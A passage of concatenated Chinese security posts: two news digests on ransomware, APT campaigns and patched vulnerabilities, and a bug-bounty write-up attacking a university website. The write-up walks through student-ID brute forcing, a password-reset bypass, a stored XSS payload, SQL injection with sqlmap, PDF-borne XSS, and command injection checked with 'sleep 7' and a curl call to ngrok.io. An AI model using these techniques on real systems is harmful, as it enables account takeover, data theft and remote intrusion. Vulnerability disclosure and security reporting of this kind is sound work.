软件中发现的两个新漏洞的信息。AMI制造的BMC存在于全球数以百万计的设备中，应用于安培、华擎、华硕、Arm、戴尔、技嘉、HPE、华为、浪潮、联想、Nvidia、高通、广达、泰安等大公司的产品中。 5、Turla组织使用DeliveryCheck恶意软件进行攻击活动 https://cert.gov.ua/article/5213167 研究人员称，Turla黑客组织正在发起新一轮的攻击活动，并使用新型“DeliveryCheck”恶意软件针对国防工业和微软Exchange服务器进行攻击。Turla组织又名Secret Blizzard、KRYPTON、UAC-0003，被认为是俄罗斯的APT组织。攻击者利用包含Excel XLSM附件的钓鱼邮件发起攻击，这些文件中包含恶意宏，执行后将会执行PowerShell命令，并创建仿冒Firefox浏览器更新程序的计划任务。该计划任务将下载DeliveryCheck后门（也称为CapiBar和GAMEDAY）并在 6、通用电气修复Cimplicity产品中的安全漏洞 https://www.securityweek.com/recently-patched-ge-cimplicity-vulnerabilities-reminiscent-of-russian-ics-attacks/ 通用电气Cimplicity人机界面（HMI）和监控与数据采集（SCADA）产品中含有安全漏洞，其中一个被标记为CVE-2023-3463，是一个远程代码执行漏洞。通用电气发布了一个安全补丁，并指出只有通过本地访问系统的身份验证用户从恶意来源获取并打开文档，该漏洞才有可能被利用，因此用户的安全部署和强大的访问管理至关重要。除此之外，还存在13个漏洞，包括未初始化的指针、越 7、多个 DDoS 僵尸网络利用最近的 Zyxel 漏洞 https://www.securityweek.com/multiple-ddos-botnets-exploiting-recent-zyxel-vulnerability/ 据网络安全公司 Fortinet 报道，多个分布式拒绝服务 (DDoS) 僵尸网络正在瞄准 Zyxel 防火墙中的一个漏洞，该漏洞的补丁自 4 月份以来就已发布。该问题被追踪为CVE-2023-28771（CVSS 评分为 9.8），被描述为导致远程执行操作系统命令的错误消息处理错误。 8、著名黑客凯文·米特尼克去世，享年 59 岁 https://www.securityweek.com/famed-hacker-kevin-mitnick-dead-at-59/ 国外媒体披露，美国网络安全咨询师、第一个被美国联邦调查局（FBI)通缉的天才黑客凯文・米特尼克（Kevin David Mitnick）于 2023 年 7 月16 日去世，享年59 岁。 9、乌克兰捣毁大型机器人账户窝点，没收 15 万张 SIM 卡 https://www.bleepingcomputer.com/news/security/ukraine-takes-down-massive-bot-farm-seizes-150-000-sim-cards/ 网络警察确定，攻击者使用特殊设备和软件在各种社交网络中注册了数千个机器人帐户，发布了违反乌克兰规范和立法的广告。 10、Oracle发布508个安全更新，包含数十个高危漏洞的安全更新 https://www.securityweek.com/oracle-releases-508-new-security-patches-with-july-2023-cpu/ Oracle发布508个安全更新，其中包含针对数十个针对高危漏洞进行修复的安全更新。作为本季度安全更新的一部分，对金融服务产品的补丁数量最多，为147个。在已解决的漏洞中，115个可以被具有网络访问权限的未经身份验证的远程攻击者利用。Oracle建议客户及时应用可用的修补程序，或阻止网络访问未修复的应用程序，以降低遭受攻击的风险。目前已经发现相关安全漏洞被恶意利用，未经修复的Oracle产品已成为攻击的目标。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 前几天是准备上点edusrc的分的所以就准备用手上还没刷的Nday继续上分，然后就有了今天这个案例： 信息收集 之前在挖某体育学院证书的时候就挖到过一个通过修改html文件更改密码修改步骤的漏洞 所以就准备测绘一下这个资产继续看看能不能上分 挑一个打开： 没有背景图了但还是同资产，因为在测试某体育学院的时候是有账户的，所以直接输入那个账户就能进行下一步操作了，但是这个资产无账户，所以我打算去在搜集一下学号之类的 学号这块都是一无所获，然后正准备想其它切入点的时候就突然发现 这块的要求是输入学号后5位，而学号通常是有规律的，所以就去生成字典FUZZ了一下 Python输出从00000~99999字典的程序为： dictionary = {} for i in range(100000): key = str(i).zfill(5) value = \"Value \" + key dictionary\[key\] = value with open(\'dict.txt\', \'w\') as file: for key, value in dictionary.items(): file.write(key + \'\\n\') 载入字典后还要设置下时间 最后成功拿到几个账户 EDUSRC不收爆破类漏洞所以这个学号不能算是漏洞，但最后学号总归是出来了 随后直接输入FUZZ出的5位学号把 https://1.test.edu.cn/passworf/find1_html后的find1_html改为find2_html 直接输入我们要重置的密码更改成功后去登录后台： 持续浏览功能点寻找突破点： 发现一个活动添加点 不存在上传点但是存在描述功能，直接构造xss的payload试试： <Script>alert("1)</Script> 存储XSS+1 此处的payload：<Script>alert("1)</Script> 采用大小写绕过 随后又发现一个信息上传点： 这几块点是透明没开bp，然后就打算开BP看看能不能拿到些什么突破口 点击这块的【添加简历信息】下面的标题处的第一个点 发现是个信息编辑界面但它这块是跳出个小窗口的所以前面没怎么注意到开了BP抓包时才发现这块点： 点击右侧的修改抓包后： 发现id值，直接单引号闭合查看： 浏览器端： 发现执行了sql语句 且发现是GET请求： 所以把这块的路径拉到浏览器直接访问 这样就不用担心防sqlmap表单了，且不用打包数据包更快捷了 Sqlmap成功跑出数据！ Sql注入+1 随后继续到【会员注册】处 直接在搜索处单引号闭合： 成功执行查询语句 F12调出网络又发现也是GET请求方式，复制请求URL直接查看回显 直接sqlmap跑 Sql注入+2 然后点击右上角【管理员】三个字 一开始没发现这三个字还能点击，点击后发现到了信息上传点： 这块可以上传文件先上传个php试试 提示只能上传上面列出的文件类型，正要准备想其它办法绕过的时候突然发现这块允许上传的文件类型中包括pdf，所以直接上传一个pdf-xss试试： 成功上传然后浏览器访问试试： 但浏览器提示没有文件，然后仔细看了一下文件上传回显： 这里的uploadfile/16893293978.pdf的路径是跟在了?value=参数后面的然后这块参数给完后还在后面又跟了个参数： ？file=url=uploadfile/16893293978.pdf，再回到请求包中的参数： 发现此处的有个&field=url的参数尝试把参数改成1 浏览器回显不存在"1"，所以这块就明了的，参数&field=后面应该接的参数是文件上传后的路径，因为我们这块输入1，不存在1这个文件所以回显NotFound ，明了了这块所以我们那文件试试： 放包： 成功触发XSS 存储xss+2 但是这块的任务是getshell所以还是继续尝试文件上传 修改MIME信息且php5分段绕过但还是提示不能上传，传了图片马但是不能解析 这块上传应该是写死了，所以继续找其它突破口，查看参数发现存在"filename" 问题参数啊，迅速添加延时命令试试： `sleep 7` 回显处成功延时： 命令执行成功！进一步探测： Curl命令探测ngrok.io 成功回显！ 命令执行+1，最后相对应的用命令获取shell就行 总结 整体难度适中只不过这次测试后台功能点有点多需要仔细观察测试，后台的信息收集做好了Getshell难度瞬间就变小了。

1、研究人员发现冒充安全公司的SophosEncrypt勒索软件 https://www.bleepingcomputer.com/news/security/cybersecurity-firm-sophos-impersonated-by-new-sophosencrypt-ransomware 研究人员近期发现一种冒充安全公司的SophosEncrypt勒索软件，该勒索软件使用Rust语言进行编写。SophosEncrypt勒索软件使用AES256加密算法，在加密文件的每个文件夹中放置一个名为information.hta的勒索信，并在加密完成后自动打开该勒索信。勒索信中记录了受害者被攻击的信息及相关联系信息。该勒索软件会对Windows桌面壁纸进行 2、攻击者利用谷歌云构建服务中的漏洞发起供应链攻击 https://orca.security/resources/blog/bad-build-google-cloud-build-potential-supply-chain-attack-vulnerability 研究人员在谷歌云构建服务中发现了一个设计漏洞，该漏洞使攻击者能够提升权限，从而使他们能够未经授权访问谷歌构件注册表中的代码库。攻击者可以操纵谷歌构件注册表中的镜像并注入恶意代码，根据受感染镜像构建的任何应用程序都会受到影响，其潜在风险包括拒绝服务（DoS）攻击、数据泄露和传播恶意软件。更糟糕的是，如果被感染的应用程序被部署在客户的环境中，风险就会转移到客户的环境中，从而形成供 3、Citrix修复其ADC和网关产品中的零日漏洞 https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467 Citrix发布安全公告，提醒客户注意NetScaler ADC和NetScaler Gateway产品中的一个高危漏洞，该漏洞被标记为CVE-2023-3519，CVSS评分为9.8，本月早些时候已经有人在黑客论坛中对该漏洞进行了披露。攻击者可以利用该漏洞在未经身份验证的情况下远程执行代码。Citrix表示，已经发现攻击者在受影 4、医疗设备制造商BD公司在其产品中发现多个安全漏洞 https://www.govinfosecurity.com/medical-device-maker-flags-8-flaws-in-drug-infusion-products-a-22562 医疗设备制造商Becton,Dickinson and Company（BD公司）在公告中表示，已通过例行内部安全测试发现其BD Alaris Guardrails Suite MX中的八个安全漏洞漏洞，这些漏洞影响该产品的12.1.3及更早版本。BD公司表示，他们已经对所有的八个漏洞进行了风险评估，并确定该产品的现有控制措施能够降低面临风险的可能性。该公司表示，剩余的风险处于可以接受的范围， 5、Hive0129组织针对拉丁美洲的金融机构进行攻击 https://securityintelligence.com/posts/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan 研究人员发现了几封2023年4月底至5月的钓鱼邮件，攻击者冒充政府机构，诱导用户点击右邮件中的链接，并最终执行一种名为BlotchyQuasar的恶意软件，该恶意软件与Hive0129组织相关联。BlotchyQuasar是在QuasarRAT代码的基础上进行开发的，该恶意软件中包含银行应用程序的硬编码列表，目前正在持续开发中，并支持各种不同的自定义命令。BlotchyQua 6、国际汽联世界耐力锦标赛车手护照泄露 https://securityaffairs.com/148587/security/fia-world-endurance-championship-data-leak.html Cybernews 研究小组发现，运营国际汽联世界耐力锦标赛网站的勒芒耐力赛管理公司通过泄露数百名车手的身份证件和驾照，泄露了他们的数据。 7、CISA命令政府机构缓解Windows和Office零日漏洞 https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-mitigate-windows-and-office-zero-days/ CISA命令联邦机构减轻远程代码执行零日影响Windows和Office产品，这些产品被总部位于俄罗斯的RomCom网络犯罪集团在北约网络钓鱼攻击中利用。 8、Meta 因侵犯隐私而面临每日 10 万美元的罚款 https://cybernews.com/news/meta-fined-hundreds-thousands-daily/ 挪威数据保护机构表示，Facebook和Instagram所有者Meta将因侵犯隐私而被罚款10万美元，除非采取补救措施。 9、网络犯罪论坛BreachForums的管理员认罪，最高面临30年监禁 https://www.secrss.com/articles/56806 BreachForums在被FBI查封之前被认为是世界上最大的英语数据泄露论坛，该论坛拥有超过333000名会员、888个数据库、140亿个人记录。 10、匿名苏丹对美国政府机构NIST发起有针对性的网络攻击 https://thecyberexpress.com/nist-cyber-attack-anonymous-sudan/ 美国政府组织国家标准与技术研究院（NIST）最近被匿名苏丹黑客组织列为网络攻击的目标。根据威胁情报服务Falcon Feeds的一条推文，在NIST网络攻击之后，官方网站无法访问。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员称NoEscape勒索组织与Avaddon存在关联 https://www.bleepingcomputer.com/news/security/meet-noescape-avaddon-ransomware-gangs-likely-successor NoEscape勒索组织出现于2023年6月份，该勒索组织针对企业进行双重勒索攻击。攻击者对Windows、Linux系统和VMware ESXi服务器进行攻击，窃取数据并对文件进行加密。该勒索组织所勒索的金钱从数十万美元到一千多万美元不等，并已经在其数据泄露网站上列出了来自不同国家和行业的十个受害者。研究人员在对NoEscape勒索组织的加密程序进行研究后表示，该组织使用的加密程序与Av 2、攻击者利用WooCommerce Payments插件漏洞进行攻击活动 https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway Wordfence警告称，攻击者正在利用Woocommerce Payments插件中的漏洞针对157000多个网站进行大规模的攻击活动。该漏洞被标记为CVE-2023-28121，此次攻击活动从7月14日开始，在周末期间持续，并于7月16日达到高峰，对157000个网站的总攻击量达到130万次。Wordfence表示，攻击者正在利用该漏洞在目标网站中安装WP控制台插件或创 3、研究人员发现一种名为WormGPT的恶意工具 https://slashnext.com/blog/wormgpt-the-generative-ai-tool-cybercriminals-are-using-to-launch-business-email-compromise-attacks 研究人员近期在黑客论坛中发现了一种名为WormGPT的恶意攻击，该工具是专门为恶意攻击活动设计的GPT模型。WormGPT是一个基于GPTJ语言模型的人工智能模块，于2021年开发。它拥有一系列功能，包括无限字符支持、聊天内存保留和代码格式化等。WormGPT据称是在各种数据源上进行训练的，特别是集中在与恶意软件相关的数据上。然而，其开发者对 4、Virustotal 数据泄露暴露了一些注册客户的数据，包括情报成员 https://securityaffairs.com/148577/security/virustotal-leaked-customers-data.html 据德国报纸报道，在线恶意软件扫描服务 VirusTotal 泄露了与一些注册客户相关的数据。 5、419约会应用程序声称 5000 万用户遭受数据泄露 https://www.vpnmentor.com/news/report-419dating-breach/ 网络安全研究员 Jeremiah Fowler 发现并向vpnMentor报告了一个包含大约 230 万条记录的无密码保护数据库。经过进一步调查，很明显这些记录与单个数据库中包含的多个约会应用程序相关联。该数据库似乎包含大量用户记录，包括客户姓名、帐号、电子邮件、密码等。 6、FIN8 使用改进的 Sardonic 后门传播 Noberus 勒索软件 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor 网络犯罪组织 FIN8 正在使用 Sardonic 后门的改进版本来传播 BlackCat 勒索软件。 7、思科修复 SD-WAN vManage 中的一个关键漏洞 https://securityaffairs.com/148524/security/cisco-sd-wan-vmanage-critical-bug.html 思科警告其 SD-WAN vManage 存在一个关键的未经验证的 REST API 访问漏洞，该漏洞被追踪为 CVE-2023-20214。 8、Gamaredon 黑客在入侵 30 分钟后开始窃取数据 https://www.bleepingcomputer.com/news/security/gamaredon-hackers-start-stealing-data-30-minutes-after-a-breach 乌克兰计算机应急小组(CERT-UA)警告说，Gamaredon 黑客攻击行动迅速，可在一小时内从被入侵系统中窃取数据。 9、欧盟敦促做好应对量子网络攻击的准备 https://www.infosecurity-magazine.com/news/eu-prepare-quantum-cyber-attacks/ 文件《欧洲量子网络安全议程》强调迫切需要制定一项新的欧盟协调行动计划，以便在 "Q日"（量子计算机能够破解现有加密算法的时间点）之前促进量子安全技术的发展。 10、腓尼基医疗中心证实其患者的数据泄露 https://www.hipaajournal.com/phoenician-medical-center-cyberattack-affects-up-to-162500-patients/ 腓尼基医疗中心股份有限公司（PMC）最近报告了一起安全事件，网络攻击导致其部分IT系统中断。此次攻击事件于2023年3月31日被发现，但尚不清楚攻击开始的具体时间，未经授权的攻击者访问了包含患者健康信息的文件。PMC确认受影响的信息包括姓名、联系信息、人口统计信息、出生日期、身份证号码、医疗记录号码、诊断和治疗信息、提供者姓名、服务日期、处方信息以及健康保险信息。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。